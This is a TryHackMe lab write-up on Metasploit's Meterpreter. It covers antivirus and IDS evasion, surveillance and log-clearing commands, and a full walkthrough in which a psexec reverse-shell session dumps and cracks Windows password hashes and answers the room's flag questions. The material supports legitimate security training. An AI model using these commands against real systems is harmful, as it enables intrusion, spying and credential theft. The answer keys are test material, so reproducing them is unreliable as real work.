THM: Metasploit: Meterpreter

Introduction to Meterpreter

Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreter will run on the target system and act as an agent within a command and control architecture. You will interact with the target operating system and files and use Meterpreter's specialized commands.

Meterpreter runs on the target system but is not installed on it. It runs in memory and does not write itself to the disk on the target. This feature aims to avoid being detected during antivirus scans. By default, most antivirus software will scan new files on the disk (e.g. when you download a file from the internet) Meterpreter runs in memory (RAM - Random Access Memory) to avoid having a file that has to be written to the disk on the target system (e.g. meterpreter.exe). This way, Meterpreter will be seen as a process and not have a file on the target system.

Meterpreter also aims to avoid being detected by network-based IPS (Intrusion Prevention System) and IDS (Intrusion Detection System) solutions by using encrypted communication with the server where Metasploit runs (typically your attacking machine). If the target organization does not decrypt and inspect encrypted traffic (e.g. HTTPS) coming to and going out of the local network, IPS and IDS solutions will not be able to detect its activities.

While Meterpreter is recognized by major antivirus software, this feature provides some degree of stealth.

The example below shows a target Windows machine exploited using the MS17-010 vulnerability. You will see Meterpreter is running with a process ID (PID) of 1304; this PID will be different in your case.

We have used the getpid command, which returns the process ID with which Meterpreter is running. The process ID (or process identifier) is used by operating systems to identify running processes. All processes running in Linux or Windows will have a unique ID number; this number is used to interact with the process when the need arises (e.g. if it needs to be stopped).

Getpid

meterpreter > getpid 
Current pid: 1304

If we list processes running on the target system using the ps command, we see PID 1304 is spoolsv.exe and not Meterpreter.exe, as one might expect.

The ps command

meterpreter > ps

Even if we were to go a step further and look at DLLs (Dynamic-Link Libraries) used by the Meterpreter process (PID 1304 in this case), we still would not find anything jumping at us (e.g. no meterpreter.dll)

C:\Windows\system32>tasklist /m /fi "pid eq 1304"

Meterpreter Flavors

Metasploit payloads can be initially divided into two categories:

inline (also called single)
staged.

staged payloads are sent to the target in two steps. An initial part is installed (the stager) and requests the rest of the payload. This allows for a smaller initial payload size.

The inline payloads are sent in a single step.

Meterpreter payloads are also divided into stagged and inline versions.

However, Meterpreter has a wide range of different versions you can choose from based on your target system.

The easiest way to have an idea about available Meterpreter versions could be to list them using msfvenom, as seen below.

We have used the msfvenom --list payloads command and grepped "meterpreter" payloads (adding | grep meterpreter to the command line), so the output only shows these. You can try this command on the AttackBox.

root@ip-10-10-186-44:~# msfvenom --list payloads | grep meterpreter

The list will show Meterpreter versions available for the following platforms;

Android
Apple iOS
Java
Linux
OSX
PHP
Python
Windows

Your decision on which version of Meterpreter to use will be mostly based on three factors:

The target operating system (Is the target operating system Linux or Windows? Is it a Mac device? Is it an Android phone? etc.)
Components available on the target system (Is Python installed? Is this a PHP website? etc.)
Network connection types you can have with the target system (Do they allow raw TCP connections? Can you only have an HTTPS reverse connection? Are IPv6 addresses not as closely monitored as IPv4 addresses? etc.)

Meterpreter Commands

Typing help on any Meterpreter session (shown by meterpreter> at the prompt) will list all available commands.

Every version of Meterpreter will have different command options, so running the help command is always a good idea. Commands are built-in tools available on Meterpreter. They will run on the target system without loading any additional script or executable files.

Meterpreter will provide you with three primary categories of tools;

Built-in commands
Meterpreter tools
Meterpreter scripting

If you run the help command, you will see Meterpreter commands are listed under different categories.

Core commands
File system commands
Networking commands
System commands
User interface commands
Webcam commands
Audio output commands
Elevate commands
Password database commands
Timestomp commands

Please note that the list above was taken from the output of the help command on the Windows version of Meterpreter (windows/x64/meterpreter/reverse_tcp). These will be different for other Meterpreter versions.

Below are some of the most commonly used. Remember to check all available commands running the help command once a Meterpreter session has started.

Core commands

background: Backgrounds the current session
exit: Terminate the Meterpreter session
guid: Get the session GUID (Globally Unique Identifier)
help: Displays the help menu
info: Displays information about a Post module
irb: Opens an interactive Ruby shell on the current session
load: Loads one or more Meterpreter extensions
migrate: Allows you to migrate Meterpreter to another process
run: Executes a Meterpreter script or Post module
sessions: Quickly switch to another session

File system commands

cd: Will change directory
ls: Will list files in the current directory (dir will also work)
pwd: Prints the current working directory
edit: will allow you to edit a file
cat: Will show the contents of a file to the screen
rm: Will delete the specified file
search: Will search for files
upload: Will upload a file or directory
download: Will download a file or directory

Networking commands

arp: Displays the host ARP (Address Resolution Protocol) cache
ifconfig: Displays network interfaces available on the target system
netstat: Displays the network connections
portfwd: Forwards a local port to a remote service
route: Allows you to view and modify the routing table

System commands

clearev: Clears the event logs
execute: Executes a command
getpid: Shows the current process identifier
getuid: Shows the user that Meterpreter is running as
kill: Terminates a process
pkill: Terminates processes by name
ps: Lists running processes
reboot: Reboots the remote computer
shell: Drops into a system command shell
shutdown: Shuts down the remote computer
sysinfo: Gets information about the remote system, such as OS

Others Commands (these will be listed under different menu categories in the help menu)

idletime: Returns the number of seconds the remote user has been idle
keyscan_dump: Dumps the keystroke buffer
keyscan_start: Starts capturing keystrokes
keyscan_stop: Stops capturing keystrokes
screenshare: Allows you to watch the remote user's desktop in real time
screenshot: Grabs a screenshot of the interactive desktop
record_mic: Records audio from the default microphone for X seconds
webcam_chat: Starts a video chat
webcam_list: Lists webcams
webcam_snap: Takes a snapshot from the specified webcam
webcam_stream: Plays a video stream from the specified webcam
getsystem: Attempts to elevate your privilege to that of local system
hashdump: Dumps the contents of the SAM database

Post-Exploitation with Meterpreter

Meterpreter provides you with many useful commands that facilitate the post-exploitation phase. Below are a few examples you will often use.

getuid: will display the user with which Meterpreter is currently running.
ps: will list running processes.
migrate: Migrating to another process will help Meterpreter interact with it.
For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the keyscan_start, keyscan_stop, and keyscan_dump command options to make Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session.
migrate <PID>
Be careful; you may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver). You may not be able to gain them back.
hashdump: will list the content of the SAM database. The SAM (Security Account Manager) database stores user's passwords on Windows systems. These passwords are stored in the NTLM (New Technology LAN Manager) format.
search: command is useful to locate files with potentially juicy information.
search -f flag2.txt
shell: will launch a regular command-line shell on the target system. Pressing CTRL+Z or exit will help you go back to the Meterpreter shell.

Post-Exploitation Challenge

Commands mentioned previously, such as getsystem and hashdump will provide important leverage and information for privilege escalation and lateral movement. Meterpreter is also a good base you can use to run post-exploitation modules available on the Metasploit framework. Finally, you can also use the load command to leverage additional tools such as Kiwi or even the whole Python language.

meterpreter > load python
Loading extension python...Success.
meterpreter > python_execute "print 'TryHackMe Rocks!'"
[+] Content written to stdout:
TryHackMe Rocks!

meterpreter >

The post-exploitation phase will have several goals; Meterpreter has functions that can assist all of them.

Gathering further information about the target system.
Looking for interesting files, user credentials, additional network interfaces, and generally interesting information on the target system.
Privilege escalation.
Lateral movement.

Once any additional tool is loaded using the load command, you will see new options on the help menu. The example below shows commands added for the Kiwi module (using the load kiwi command).

The questions below will help you have a better understanding of how Meterpreter can be used in post-exploitation.

You can use the credentials below to simulate an initial compromise over SMB (Server Message Block) (using exploit/windows/smb/psexec)

Username: ballen

Password: Password1

Answer the questions

What is the computer name?

root@ip-10-10-30-254:~# msfconsole
msf6 > db_nmap -A -nn 10.10.143.34
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-19 16:08 BST
[*] Nmap: Nmap scan report for 10.10.143.34
[*] Nmap: Host is up (0.00075s latency).
[*] Nmap: Not shown: 987 filtered ports
[*] Nmap: PORT     STATE SERVICE       VERSION
[*] Nmap: 53/tcp   open  domain?
[*] Nmap: | fingerprint-strings:
[*] Nmap: |   DNSVersionBindReqTCP:
[*] Nmap: |     version
[*] Nmap: |_    bind
[*] Nmap: 80/tcp   open  http          Microsoft IIS httpd 10.0
[*] Nmap: | http-methods:
[*] Nmap: |_  Potentially risky methods: TRACE
[*] Nmap: |_http-server-header: Microsoft-IIS/10.0
[*] Nmap: |_http-title: IIS Windows Server
[*] Nmap: 88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-19 15:08:54Z)
[*] Nmap: 135/tcp  open  msrpc         Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
[*] Nmap: 389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
[*] Nmap: 445/tcp  open  microsoft-ds?
[*] Nmap: 464/tcp  open  kpasswd5?
[*] Nmap: 593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
[*] Nmap: 636/tcp  open  tcpwrapped
[*] Nmap: 3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
[*] Nmap: 3269/tcp open  tcpwrapped
[*] Nmap: 3389/tcp open  ms-wbt-server Microsoft Terminal Services
[*] Nmap: | rdp-ntlm-info:
[*] Nmap: |   Target_Name: FLASH
[*] Nmap: |   NetBIOS_Domain_Name: FLASH
[*] Nmap: |   NetBIOS_Computer_Name: ACME-TEST
[*] Nmap: |   DNS_Domain_Name: FLASH.local
[*] Nmap: |   DNS_Computer_Name: ACME-TEST.FLASH.local
[*] Nmap: |   Product_Version: 10.0.17763
[*] Nmap: |_  System_Time: 2025-10-19T15:11:14+00:00
[*] Nmap: | ssl-cert: Subject: commonName=ACME-TEST.FLASH.local
[*] Nmap: | Not valid before: 2025-10-18T14:55:18
[*] Nmap: |_Not valid after:  2026-04-19T14:55:18
[*] Nmap: |_ssl-date: 2025-10-19T15:11:54+00:00; 0s from scanner time.
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[*] Nmap: SF-Port53-TCP:V=7.80%I=7%D=10/19%Time=68F4FF0C%P=x86_64-pc-linux-gnu%r(DNS
[*] Nmap: SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
[*] Nmap: SF:\x04bind\0\0\x10\0\x03");
[*] Nmap: MAC Address: 02:C3:59:7E:08:93 (Unknown)
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
[*] Nmap: No OS matches for host
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: ACME-TEST; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: ACME-TEST, NetBIOS user: <unknown>, NetBIOS MAC: 02:c3:59:7e:08:93 (unknown)
[*] Nmap: | smb2-security-mode:
[*] Nmap: |   2.02:
[*] Nmap: |_    Message signing enabled and required
[*] Nmap: | smb2-time:
[*] Nmap: |   date: 2025-10-19T15:11:14
[*] Nmap: |_  start_date: N/A
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.75 ms 10.10.143.34
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 194.01 seconds

msf6 > setg RHOSTS 10.10.143.34
RHOSTS => 10.10.143.34
msf6 > use exploit/windows/smb/psexec 
msf6 exploit(windows/smb/psexec) > set SMBUser ballen
SMBUser => ballen
msf6 exploit(windows/smb/psexec) > set SMBPass Password1
SMBPass => Password1

msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.10.30.254:4444 
[*] 10.10.143.34:445 - Connecting to the server...
[*] 10.10.143.34:445 - Authenticating to 10.10.143.34:445 as user 'ballen'...
[*] 10.10.143.34:445 - Selecting PowerShell target
[*] 10.10.143.34:445 - Executing the payload...
[+] 10.10.143.34:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (177734 bytes) to 10.10.143.34
[*] Meterpreter session 1 opened (10.10.30.254:4444 -> 10.10.143.34:63482) at 2025-10-19 16:17:30 +0100

meterpreter > sysinfo 
Computer        : ACME-TEST
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : FLASH
Logged On Users : 8
Meterpreter     : x86/windows
meterpreter >

Answer: ACME-TEST

What is the target domain?

Answer: FLASH

What is the name of the share likely created by the user?

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/psexec) > search type:post smb

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  post/linux/busybox/smb_share_root      .                normal  No     BusyBox SMB Sharing
   1  post/linux/gather/mount_cifs_creds     .                normal  No     Linux Gather Saved mount.cifs/mount.smbfs Credentials
   2  post/windows/escalate/droplnk          .                normal  No     Windows Escalate SMB Icon LNK Dropper
   3  post/windows/gather/credentials/gpp    .                normal  No     Windows Gather Group Policy Preference Saved Passwords
   4  post/windows/gather/word_unc_injector  .                normal  No     Windows Gather Microsoft Office Word UNC Path Injector
   5  post/windows/gather/enum_shares        .                normal  No     Windows Gather SMB Share Enumeration via Registry
   6  post/windows/gather/netlm_downgrade    .                normal  No     Windows NetLM Downgrade Attack


Interact with a module by name or index. For example info 6, use 6 or use post/windows/gather/netlm_downgrade

msf6 exploit(windows/smb/psexec) > use 5
msf6 post(windows/gather/enum_shares) > show options

Module options (post/windows/gather/enum_shares):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CURRENT  true             yes       Enumerate currently configured shares
   ENTERED  true             yes       Enumerate recently entered UNC Paths in the Run Dialog
   RECENT   true             yes       Enumerate recently mapped shares
   SESSION                   yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(windows/gather/enum_shares) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/enum_shares) > run
[*] Running module against ACME-TEST (10.10.143.34)
[*] The following shares were found:
[*] 	Name: SYSVOL
[*] 	Path: C:\Windows\SYSVOL\sysvol
[*] 	Remark: Logon server share 
[*] 	Type: DISK
[*] 
[*] 	Name: NETLOGON
[*] 	Path: C:\Windows\SYSVOL\sysvol\FLASH.local\SCRIPTS
[*] 	Remark: Logon server share 
[*] 	Type: DISK
[*] 
[*] 	Name: speedster
[*] 	Path: C:\Shares\speedster
[*] 	Type: DISK
[*] 
[*] Post module execution completed
msf6 post(windows/gather/enum_shares) >

Answer: speedster

What is the NTLM hash of the jchambers user?

msf6 post(windows/gather/enum_shares) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:22a7966f029f5db5934ffeb0deb9c792:::
meterpreter >

Answer: 69596c7aa1e8daee17f8e78870e25a5c

What is the cleartext password of the jchambers user?

https://hashes.com/en/decrypt/hash

69596c7aa1e8daee17f8e78870e25a5c:Trustno1

Answer: Trustno1

Where is the "secrets.txt" file located? (Full path of the file)

meterpreter > search -f secrets.txt

Answer c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt

What is the Twitter password revealed in the "secrets.txt" file?

meterpreter > shell
Process 612 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>type "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"
type "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"
My Twitter password is KDSvbsw3849!
C:\Windows>

Answer: KDSvbsw3849!

Where is the "realsecret.txt" file located? (Full path of the file)

C:\Windows>exit
exit
meterpreter > search -f realsecret.txt

Answer: c:\inetpub\wwwroot\realsecret.txt

What is the real secret?

meterpreter > shell
Process 3444 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>type "c:\inetpub\wwwroot\realsecret.txt"
type "c:\inetpub\wwwroot\realsecret.txt"
The Flash is the fastest man alive
C:\Windows>

Answer: The Flash is the fastest man alive